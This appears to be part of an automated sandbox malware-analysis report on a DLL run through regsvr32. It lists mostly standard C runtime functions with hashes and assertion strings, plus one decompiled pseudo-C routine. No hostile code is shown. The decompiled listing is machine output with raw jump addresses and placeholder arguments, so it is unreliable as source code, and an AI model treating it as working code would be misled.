                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                    • API String ID: 2123368286-2816485415
                                    • Opcode ID: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                    • Instruction ID: 498ed5c56ac792471b44c6766317b9cb43c4201113c662a7075568a19f5733c1
                                    • Opcode Fuzzy Hash: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                    • Instruction Fuzzy Hash: 0E617B72A1D64686EB909B28EC4176E73E1F780354F608225E6DE47AF5D77EE400CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D40A20 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                    • API String ID: 747159061-2992490823
                                    • Opcode ID: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                    • Instruction ID: b3e96d9819a7910145883aa8d7fc7971cc91d039debb2f2cb13e78280c4cdede
                                    • Opcode Fuzzy Hash: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                    • Instruction Fuzzy Hash: 2F516B71A186468AE7909B69EC8176E73E2F380758F608621E2DD476F5D77EE400CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3E2FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 231COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1328470723-1899493600
                                    • Opcode ID: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                    • Instruction ID: a75f166a54a10c782c9e5936c38e4db03d9624ec2b4b775b3bb68b676b0f6840
                                    • Opcode Fuzzy Hash: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                    • Instruction Fuzzy Hash: 38C10D72A0CAC286E7B19B55E8447AFB7E0F384346F604125E6C987AE9DB7DE444CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2EFB0 Relevance: 16.7, APIs: 11, Instructions: 200memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                    • String ID:
                                    • API String ID: 2352934578-0
                                    • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                    • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                    • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                    • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D33380 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 330COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                    • API String ID: 2123368286-322314505
                                    • Opcode ID: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                    • Instruction ID: 4ea1f2baf56cb797ddf9edfbcd87f382fde430b96fb790801732b827a7e5f6be
                                    • Opcode Fuzzy Hash: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                    • Instruction Fuzzy Hash: 02023E32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3E424 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 307COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1139040907-3988320827
                                    • Opcode ID: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                    • Instruction ID: be767cf373226b306d5cc4d655a52930cc25a89ebff261bf8d2d4167a1edb2b7
                                    • Opcode Fuzzy Hash: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                    • Instruction Fuzzy Hash: 48F1DA72A0CAC18AE7A08B55E8407AFB7E0F7C5756F600126E6CD87AA9DB7DD440CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D31640 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 233COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                    • API String ID: 2123368286-3300880850
                                    • Opcode ID: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                    • Instruction ID: 4116fe211f4ce550b5db6f2beda9aad957ea61137f05a11edd57804cc24ee7cf
                                    • Opcode Fuzzy Hash: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                    • Instruction Fuzzy Hash: A4C14B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA5DF7ED084CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2D490 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                    • API String ID: 2123368286-3045918802
                                    • Opcode ID: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                    • Instruction ID: 83c83e0f84f27b13c419585d1e3107a86c1b002b2dbb410691c45864cb0988c3
                                    • Opcode Fuzzy Hash: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                    • Instruction Fuzzy Hash: 3AC13D3190DB8A85EBA08B19E84436EA3E0F386794F614135D6DE43BB5DF7ED448CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3F000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 15%
                                    			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
				intOrPtr _v24;
				long long _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t80;
				void* _t81;
				void* _t89;
				void* _t92;
				intOrPtr _t102;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				intOrPtr* _t148;
				intOrPtr* _t149;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 == 0) goto 0xf9d3f031;
				if (_a24 != 0) goto 0xf9d3f038;
				goto 0xf9d3f31a;
				_t136 = _a16;
				if ( *_t136 != 0) goto 0xf9d3f066;
				if (_a8 == 0) goto 0xf9d3f05f;
				 *_a8 = 0;
				goto 0xf9d3f31a;
				0xf9d266b0();
				_t80 = E000007FE7FEF9D26840(0,  &_v88);
				_t137 =  *_t136;
				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
				_v104 = _t139;
				r9d = 0;
				r8d = 0x47;
				0xf9d2b3b0();
				if (_t81 != 1) goto 0xf9d3f0d2;
				asm("int3");
				E000007FE7FEF9D26840(0,  &_v88);
				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
				if (_a8 == 0) goto 0xf9d3f106;
				_t141 = _a16;
				 *_a8 =  *_t141 & 0x000000ff;
				_v56 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v56,  &_v88);
				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
				_t142 =  *_t141;
				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
				E000007FE7FEF9D26840(_t89,  &_v88);
				_t143 =  *_t142;
				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
				if (_a8 == 0) goto 0xf9d3f191;
				_v36 = 1;
				goto 0xf9d3f199;
				_v36 = 0;
				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
				_t144 =  *_t143;
				_v32 = _t144;
				E000007FE7FEF9D26840(_t92,  &_v88);
				_v96 = _v36;
				_v104 = _a8;
				r9d =  *((intOrPtr*)(_v32 + 0x10c));
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
				E000007FE7FEF9D26840(_t94,  &_v88);
				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
				_t148 = _a16;
				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
				0xf9d2ab30();
				 *_t148 = 0x2a;
				_v52 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v52,  &_v88);
				_t149 =  *_t148;
				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
				E000007FE7FEF9D26800( &_v88);
				_t102 = _v48;
				goto 0xf9d3f310;
				if (_a8 == 0) goto 0xf9d3f28b;
				_v24 = 1;
				goto 0xf9d3f293;
				_v24 = 0;
				E000007FE7FEF9D26840(_t102,  &_v88);
				_v96 = _v24;
				_v104 = _a8;
				r9d = 1;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
				0xf9d2ab30();
				 *((intOrPtr*)( *_t149)) = 0x2a;
				_v44 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				_v40 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				return E000007FE7FEF9D26800( &_v88);
			}




























                                    0x7fef9d3f000
                                    0x7fef9d3f005
                                    0x7fef9d3f00a
                                    0x7fef9d3f00f
                                    0x7fef9d3f024
                                    0x7fef9d3f02f
                                    0x7fef9d3f033
                                    0x7fef9d3f038
                                    0x7fef9d3f045
                                    0x7fef9d3f050
                                    0x7fef9d3f05c
                                    0x7fef9d3f061
                                    0x7fef9d3f073
                                    0x7fef9d3f07d
                                    0x7fef9d3f082
                                    0x7fef9d3f08c
                                    0x7fef9d3f093
                                    0x7fef9d3f0a2
                                    0x7fef9d3f0a4
                                    0x7fef9d3f0ab
                                    0x7fef9d3f0b0
                                    0x7fef9d3f0b3
                                    0x7fef9d3f0c5
                                    0x7fef9d3f0cd
                                    0x7fef9d3f0cf
                                    0x7fef9d3f0d7
                                    0x7fef9d3f0e3
                                    0x7fef9d3f0ee
                                    0x7fef9d3f0f0
                                    0x7fef9d3f103
                                    0x7fef9d3f106
                                    0x7fef9d3f113
                                    0x7fef9d3f11c
                                    0x7fef9d3f126
                                    0x7fef9d3f140
                                    0x7fef9d3f14b
                                    0x7fef9d3f150
                                    0x7fef9d3f15a
                                    0x7fef9d3f165
                                    0x7fef9d3f16a
                                    0x7fef9d3f17a
                                    0x7fef9d3f185
                                    0x7fef9d3f187
                                    0x7fef9d3f18f
                                    0x7fef9d3f191
                                    0x7fef9d3f19e
                                    0x7fef9d3f1a3
                                    0x7fef9d3f1a6
                                    0x7fef9d3f1b0
                                    0x7fef9d3f1bc
                                    0x7fef9d3f1c8
                                    0x7fef9d3f1d2
                                    0x7fef9d3f1f1
                                    0x7fef9d3f1f8
                                    0x7fef9d3f20f
                                    0x7fef9d3f211
                                    0x7fef9d3f21f
                                    0x7fef9d3f221
                                    0x7fef9d3f226
                                    0x7fef9d3f22c
                                    0x7fef9d3f239
                                    0x7fef9d3f242
                                    0x7fef9d3f24c
                                    0x7fef9d3f251
                                    0x7fef9d3f25a
                                    0x7fef9d3f263
                                    0x7fef9d3f268
                                    0x7fef9d3f271
                                    0x7fef9d3f27f
                                    0x7fef9d3f281
                                    0x7fef9d3f289
                                    0x7fef9d3f28b
                                    0x7fef9d3f298
                                    0x7fef9d3f2a4
                                    0x7fef9d3f2b0
                                    0x7fef9d3f2b5
                                    0x7fef9d3f2d3
                                    0x7fef9d3f2d5
                                    0x7fef9d3f2da
                                    0x7fef9d3f2e0
                                    0x7fef9d3f2ed
                                    0x7fef9d3f2f6
                                    0x7fef9d3f2f8
                                    0x7fef9d3f305
                                    0x7fef9d3f30e
                                    0x7fef9d3f321

                                    APIs
                                    Strings
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                    • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                    • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                    • API String ID: 3162172745-1617866167
                                    • Opcode ID: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                    • Instruction ID: e2321dfd7d4ce97f8464894d094ef21069f5ab619bd2151a5dc0ee19d75eafe6
                                    • Opcode Fuzzy Hash: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                    • Instruction Fuzzy Hash: A9913B32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D26BF0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 127COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                    • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 792801276-1329727594
                                    • Opcode ID: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                    • Instruction ID: 74781b4b54cd9912b8e06a4704f6bb443746ab51bab07e1bca88e51f830d20d4
                                    • Opcode Fuzzy Hash: 607a4edc1d8635394f44f6361f5afd02e99ede9dffc913f916da5ff8546dd257
                                    • Instruction Fuzzy Hash: E9613972A0D7C186E7B49B51E8907AEBBA0F784740FA18126D6CD47BA9DB3ED444CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3F900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 105COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                    • API String ID: 747159061-3177431134
                                    • Opcode ID: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                    • Instruction ID: 4f8ff4572e8635f5027188ec8a382c63b1dfded0e2620b7392a92efec120cf46
                                    • Opcode Fuzzy Hash: 733470a45f5ff35a9cc2dbc2e65958217baa720b2ccc02f46ae502d5c05be40f
                                    • Instruction Fuzzy Hash: 78518971A1864A8AF7909B59E89076DB3E1F3807A5F609221E2ED477F4C7BEE5008B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2BA60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                    • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                    • API String ID: 1608253119-1427866139
                                    • Opcode ID: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                    • Instruction ID: bd1364e327bffe51ea07524ffa85e9f05d80aa3f671785f44ca1c30fb28e73d7
                                    • Opcode Fuzzy Hash: 6d96cea77955d8bb906b6453695997b0a193914bba0a0a822ab5dc7dadfec49f
                                    • Instruction Fuzzy Hash: 4D41253191DB4686E7A09B14E84436E76E0F785780F614535E6CD42AF8DBBEE484CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D386B0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 282COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                    • API String ID: 2123368286-2958264153
                                    • Opcode ID: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                    • Instruction ID: d7cc4d0e782f1b7c612564dac91e9d2cb6f3b6ce272f4d7ad0d490e9b620c06e
                                    • Opcode Fuzzy Hash: 54e27a84bf50c775cab06d8b5edff0f5a952963ad436725320079f8e266d75c3
                                    • Instruction Fuzzy Hash: 49E14D31A1DA868AEBB48B24E84076EB3E0F385765F204235E6DD43BE5DB7ED445CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C1A3 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
